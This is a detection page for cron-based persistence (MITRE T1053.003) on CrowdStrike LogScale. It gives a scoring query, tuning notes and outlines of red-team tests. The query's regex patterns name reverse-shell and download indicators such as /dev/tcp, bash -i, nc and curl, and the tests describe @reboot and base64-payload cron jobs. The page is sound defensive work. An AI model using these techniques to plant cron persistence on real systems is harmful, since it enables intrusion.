T1053.003 CrowdStrike LogScale · LogScale

Detect Cron in CrowdStrike LogScale

Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code. The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Adversaries use cron in Linux, macOS, and ESXi environments to execute programs at system startup or on a scheduled basis for persistence, privilege escalation, or execution. Real-world malware families including Kinsing, Skidmap, GoldMax, NKAbuse, Rocke, and Anchor have all leveraged cron for persistence. In ESXi environments, cron jobs must be created directly via the crontab file (e.g., /var/spool/cron/crontabs/root).

MITRE ATT&CK

Tactic
Execution Persistence Privilege Escalation
Technique
T1053 Scheduled Task/Job
Sub-technique
T1053.003 Cron
Canonical reference
https://attack.mitre.org/techniques/T1053/003/

LogScale Detection Query

CrowdStrike LogScale (LogScale)
cql 
// T1053.003 - Cron Persistence Detection
// Pattern 1: crontab process execution with suspicious indicators
#event_simpleName = ProcessRollup2
| CommandLine = /(?i)crontab/
| CommandLine = /(?i)(wget|curl|nc\s|ncat|netcat|\/dev\/tcp|base64\s+-d|openssl\s+enc|bash\s+-i|python\s+-c|perl\s+-e|\/tmp\/|\/dev\/shm\/|chmod\s+\+x|chmod\s+777|\.sh|@reboot)/
| groupBy([aid, ComputerName, UserName, FileName, CommandLine, ParentBaseFileName, ParentCommandLine], function=count(aid, as=event_count))
| sort(event_count, order=desc)

// Pattern 2: file writes to cron directories from suspicious parent processes
// (Run as separate query or union)
#event_simpleName = SyntheticProcessRollup2 OR #event_simpleName = ProcessRollup2
| TargetFileName = /(?i)(\/etc\/crontab|\/var\/spool\/cron|\/etc\/cron\.d\/|\/etc\/cron\.(daily|hourly|weekly|monthly)|\/var\/cron\/tabs)/
| NOT FileName IN ["dpkg", "apt", "apt-get", "yum", "rpm", "ansible", "puppet", "chef-client"]
| eval cron_path = TargetFileName
| eval has_tmp_write = if(TargetFileName = /\/tmp\/|\/dev\/shm\//, "true", "false")
| eval is_crontab_cmd = if(FileName = "crontab", "true", "false")
| eval has_download_tool = if(CommandLine = /wget|curl|\/dev\/tcp|base64\s+-d/, "true", "false")
| eval has_shell_payload = if(CommandLine = /bash\s+-i|python\s+-c|perl\s+-e|sh\s+-c/, "true", "false")
| eval suspicion_score =
    if(is_crontab_cmd = "true", 1, 0) +
    if(has_download_tool = "true", 1, 0) +
    if(has_shell_payload = "true", 1, 0) +
    if(has_tmp_write = "true", 1, 0)
| where suspicion_score > 0
| eval risk_level = if(suspicion_score >= 3, "CRITICAL",
    if(suspicion_score >= 2, "HIGH",
      if(suspicion_score >= 1, "MEDIUM", "LOW")))
| table([timestamp, ComputerName, UserName, FileName, CommandLine, ParentBaseFileName, cron_path, has_download_tool, has_shell_payload, suspicion_score, risk_level])
| sort(suspicion_score, order=desc)
high severity high confidence

Detects T1053.003 cron persistence in CrowdStrike Falcon LogScale via two correlated patterns: (1) ProcessRollup2 events where the command line references crontab combined with suspicious payload indicators (download tools, reverse shells, temp paths, chmod), and (2) file writes targeting cron directories from processes that are not known package managers. Applies a suspicion scoring model and risk classification. Covers Linux and macOS hosts reporting to Falcon.

Data Sources

CrowdStrike Falcon EDRFalcon LogScale (Humio)Falcon sensor on Linux/macOS endpoints

Required Tables

ProcessRollup2SyntheticProcessRollup2

False Positives & Tuning

  • Legitimate DevOps engineers running crontab -e interactively on Linux servers during scheduled maintenance windows
  • Automated provisioning scripts executed by cloud-init or userdata on newly launched Linux instances that configure application cron jobs
  • Monitoring and observability agents that use cron scheduling for metric collection and may reference paths in /tmp/ for temporary data storage
Download portable Sigma rule (.yml)

Other platforms for T1053.003

Microsoft Sentinel (KQL) Splunk (SPL) Elastic Security (Elastic) IBM QRadar (QRadar) Sumo Logic CSE (Sumo) Google Chronicle (YARA-L) All platforms (combined) →

Testing Methodology

Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1Add Persistent Cron Job via crontab Command

    Expected signal: Auditd: syscall write/open on /var/spool/cron/crontabs/<username>. Syslog/cron log: CMD (/tmp/argus_test.sh) entries every minute. Process creation event for crontab command. File creation event for /tmp/argus_test.sh.

  2. Test 2Add @reboot Persistence Entry to Crontab

    Expected signal: Auditd: write to /var/spool/cron/crontabs/<username> with @reboot content. Syslog: crontab modification event. Process creation for crontab command. File creation for /tmp/argus_backdoor_test.sh with chmod +x.

  3. Test 3Direct Write to /etc/cron.d/ for System-Wide Persistence

    Expected signal: Auditd: file creation syscall on /etc/cron.d/argus-test-job. File creation event with initiating process bash/sudo. Syslog: within 5 minutes, CRON execution of curl command will appear in /var/log/cron or /var/log/syslog.

  4. Test 4Cron Job with Base64-Encoded Payload Download

    Expected signal: File creation event on /etc/cron.d/argus-encoded-test. Cron execution logs showing base64 and bash commands. If wget succeeds (requires listener), process creation for wget and the payload. Auditd syscall records for file write.

Last updated: 2026-04-17 Research depth: deep
References (13)

Unlock Pro Content

Get the full detection package for T1053.003 including response playbook, investigation guide, and atomic red team tests.

Response PlaybookInvestigation GuideHunting QueriesAtomic Red Team TestsTuning Guidance
Sign Up for Pro View Pricing

Related Detections

Parent Technique

T1053Scheduled Task/Job

Related Sub-techniques

T1053.002AtT1053.005Scheduled TaskT1053.006Systemd TimersT1053.007Container Orchestration Job

Related Techniques

T1053Scheduled Task/JobT1053.005Scheduled TaskT1059.004Unix ShellT1105Ingress Tool TransferT1496Resource HijackingT1070.004File DeletionT1027Obfuscated Files or InformationT1548.001Setuid and SetgidT1136.001Local AccountT1190Exploit Public-Facing Application

Same Tactic: Execution

Popular Detections